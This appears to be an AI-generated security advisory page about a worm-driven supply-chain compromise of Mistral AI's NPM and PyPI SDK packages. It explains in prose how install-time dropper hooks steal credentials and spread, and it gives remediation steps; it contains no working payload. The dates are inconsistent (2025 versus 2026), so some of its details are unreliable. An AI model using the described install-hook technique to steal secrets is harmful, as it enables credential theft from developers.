CVEReports
CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

Product

  • Home
  • Sitemap
  • RSS Feed

Company

  • About
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



GHSA-JGG6-4RPR-WFH7

GHSA-JGG6-4RPR-WFH7: Mistral AI SDK Supply Chain Compromise via Mini Shai-Hulud Worm

Amit Schendel
Amit Schendel
Senior Security Researcher

May 18, 2026·5 min read·30 visits

Executive Summary (TL;DR)

Mistral AI's official NPM and PyPI packages were compromised by the Mini Shai-Hulud worm via a developer's stolen session tokens. Malicious package versions containing secondary dropper scripts were published, requiring immediate dependency auditing and secret rotation.

A significant supply chain compromise affected official Mistral AI software development kits (SDKs) on both NPM and PyPI ecosystems. The incident involved an automated worm known as 'Mini Shai-Hulud' that leveraged stolen maintainer credentials to publish malicious packages containing secondary dropper payloads.

Vulnerability Overview

The vulnerability represents a direct supply chain compromise affecting the official software development kits published by Mistral AI. The attack surface encompasses developer workstations, CI/CD pipelines, and any downstream systems consuming the affected dependencies from the NPM and PyPI registries.

The impacted components include multiple @mistralai scoped packages on NPM, specifically @mistralai/mistralai, @mistralai/mistralai-azure, and @mistralai/mistralai-gcp. A parallel compromise occurred in the Python ecosystem, affecting the mistralai package version 2.4.6 on PyPI.

The root cause was not a flaw in the Mistral SDK codebase itself, but rather the compromise of the software distribution pipeline. An automated worm utilized stolen authentication tokens to masquerade as an authorized maintainer, subverting the trust controls inherent in package management ecosystems.

Root Cause Analysis

The initial vector of the compromise traces back to a third-party developer ecosystem. The automated worm, designated 'Mini Shai-Hulud', originally targeted maintainers of the TanStack project. The worm acquired access to developer environments by stealing authentication tokens and session cookies associated with NPM and PyPI registries.

A Mistral AI developer held maintainer privileges for both the targeted third-party libraries and official Mistral AI repositories. The worm compromised this specific developer's local environment, granting the malware administrative access to Mistral's package publishing pipeline.

Once the local environment was compromised, the worm autonomously enumerated all packages for which the infected developer possessed publishing rights. It then initiated automated uploads of new package versions containing the embedded malicious payload, bypassing manual code review processes.

Payload Analysis and Execution Path

The injected payload varied in functionality depending on the target ecosystem. The malicious code published to the @mistralai NPM packages functioned as a dropper, designed to fetch and execute a secondary payload from a remote command-and-control server.

Analysis from multiple security vendors confirmed that the NPM variant of the dropper was broken. Execution failures within the post-install script prevented the final malware stage from running successfully on many victim machines. This execution failure mitigated the immediate technical impact for NPM consumers.

Conversely, the PyPI payload embedded within mistralai==2.4.6 was fully functional. This variant successfully executed its primary objectives, which included credential exfiltration and the subsequent propagation of the worm to newly infected developer environments.

Exploitation Methodology

The attack methodology relies entirely on subverting developer trust and manipulating package manager behaviors. The worm hooks into the installation phase of the package lifecycle. For NPM, this typically involves defining a preinstall or postinstall script within the malicious package.json.

When a victim executes a standard installation command, the package manager inadvertently triggers the worm's bootstrap script. The script immediately attempts to spawn a hidden shell process to execute encoded instructions or initiate network connections to external infrastructure.

The fully functional PyPI payload actively scans the local environment for configuration files, environment variables, and SSH keys. It targets high-value secrets, particularly authentication tokens that allow the worm to authenticate against version control systems and package registries to continue its lateral movement.

Impact Assessment

Successful execution of the functional payload results in a total loss of confidentiality and integrity for the infected environment. The attacker gains the capability to execute arbitrary code with the privileges of the user invoking the package manager.

The primary objective of the payload is credential theft. Any secrets, API keys, or environment variables present on the compromised system must be considered compromised. Specifically, the MISTRAL_API_KEY is at high risk of exfiltration, leading to unauthorized resource consumption and potential data exposure on the Mistral AI platform.

Forensic investigations by Mistral AI concluded that their internal infrastructure and production systems were not compromised during this incident. The blast radius was strictly limited to systems consuming the affected package versions published via the single compromised developer account.

Remediation and Mitigation

Immediate remediation requires verifying installed package versions across all projects. Development and security teams must audit package.json, package-lock.json, and requirements.txt files for any @mistralai scoped dependencies or the mistralai Python package updated around May 12, 2025.

If compromised versions are identified, they must be removed, and systems updated to the latest available clean versions published after the incident. Developers must forcefully purge local package caches to prevent accidental re-installation of the malicious artifacts.

# Purge NPM cache forcefully
npm cache clean --force
 
# Reinstall dependencies
npm install

Credential rotation is mandatory for any environment that executed the compromised packages. Administrators must immediately revoke and reissue all secrets, API keys, and specifically any MISTRAL_API_KEY instances that were accessible to the affected system during the vulnerability window.

Technical Appendix

CVSS Score
9.8/ 10

Affected Systems

Developer WorkstationsCI/CD PipelinesAutomated Build Systems

Affected Versions Detail

Product
Affected Versions
Fixed Version
@mistralai/mistralai
Mistral AI
Versions published ~May 12, 2025Latest post-May 12 versions
@mistralai/mistralai-azure
Mistral AI
Versions published ~May 12, 2025Latest post-May 12 versions
@mistralai/mistralai-gcp
Mistral AI
Versions published ~May 12, 2025Latest post-May 12 versions
mistralai (PyPI)
Mistral AI
== 2.4.6Latest post-May 12 versions
AttributeDetail
Attack VectorSupply Chain Compromise
CWE IDCWE-506
ImpactCredential Theft / Arbitrary Code Execution
Vulnerable Packages@mistralai/* (NPM), mistralai (PyPI)
Threat Actor / MalwareMini Shai-Hulud Worm
Primary TargetDeveloper Environments

MITRE ATT&CK Mapping

T1195.002Supply Chain Compromise: Compromise Software Dependencies
Initial Access
T1566Phishing
Initial Access
T1059.007Command and Scripting Interpreter: JavaScript
Execution
T1553.002Subvert Trust Controls: Code Signing
Defense Evasion
CWE-506
Embedded Malicious Code

Embedded Malicious Code

Vulnerability Timeline

Mini Shai-Hulud worm compromises maintainers and publishes malicious versions to NPM and PyPI
2025-05-12
Security researchers flag anomalous activity; Mistral AI publishes advisory and pulls affected versions
2025-05-12
Public disclosure and post-mortem analysis released confirming limited scope
2025-05-18

References & Sources

  • [1]GHSA-JGG6-4RPR-WFH7 Advisory

Attack Flow Diagram

Press enter or space to select a node. You can then use the arrow keys to move the node around. Press delete to remove it and escape to cancel.
Press enter or space to select an edge. You can then press delete to remove it or escape to cancel.

More Reports

•about 6 hours ago•CVE-2025-6965
7.7

CVE-2025-6965: Remote Code Execution via Integer Truncation in SQLite Aggregate Parser

An integer truncation vulnerability (CWE-197) exists in SQLite before version 3.50.2 during the processing of aggregate queries with more than 32,767 distinct column references. This causes an internal 32-bit counter to truncate to a signed 16-bit integer, producing negative values that cause out-of-bounds heap operations in release builds.

Amit Schendel
Amit Schendel
7 views•6 min read
•about 22 hours ago•CVE-2026-47291
9.8

CVE-2026-47291: Remote Code Execution in Windows HTTP.sys Kernel Driver

An integer overflow vulnerability in the Windows kernel-mode HTTP driver (HTTP.sys) allows an unauthenticated remote attacker to execute arbitrary code with kernel privileges or cause a Denial of Service via a specially crafted sequence of HTTP request headers.

Amit Schendel
Amit Schendel
15 views•8 min read
•about 24 hours ago•CVE-2026-11822
7.8

CVE-2026-11822: Memory Corruption and Buffer Overflow in SQLite FTS5 Extension

A memory corruption vulnerability exists in the FTS5 (Full-Text Search 5) extension of SQLite prior to version 3.53.2. An attacker can construct a malicious database file containing corrupt FTS5 page data. Querying this database triggers out-of-bounds reads and heap-based buffer overflows, potentially causing a crash or arbitrary code execution.

Amit Schendel
Amit Schendel
7 views•5 min read
•1 day ago•CVE-2026-56350
6.3

CVE-2026-56350: SSO Enforcement Bypass in n8n via API Parameter Pollution / Mass Assignment

A mass assignment vulnerability (CWE-915) in n8n's self-service settings API endpoint (PATCH /me/settings) allows authenticated Single Sign-On (SSO) users to disable SSO enforcement for their accounts by injecting administrative parameters. This bypasses organizational identity provider controls and multi-factor authentication (MFA).

Amit Schendel
Amit Schendel
8 views•6 min read
•5 days ago•CVE-2026-55699
6.5

CVE-2026-55699: Arbitrary Directory Deletion via Path Traversal in pnpm globalBinDir Resolver

CVE-2026-55699 (also identified as GHSA-4gxm-v5v7-fqc4) is a critical path traversal and arbitrary directory deletion vulnerability in the pnpm package manager. The issue exists because the manifest validation process fails to prevent relative path segments within the package 'bin' keys. When a malicious package containing structured path traversal markers is globally installed and later manipulated, pnpm resolves the target paths through path.join() and passes the resolved paths to a recursive deletion function, resulting in arbitrary directory removal.

Amit Schendel
Amit Schendel
23 views•6 min read
•5 days ago•CVE-2026-55700
7.1

CVE-2026-55700: Path Traversal and Arbitrary File Write in pnpm stage download

A path traversal vulnerability in pnpm stage download allows malicious registries or compromised package manifests to overwrite arbitrary files on the victim's filesystem via unvalidated package name and version fields.

Alon Barad
Alon Barad
16 views•4 min read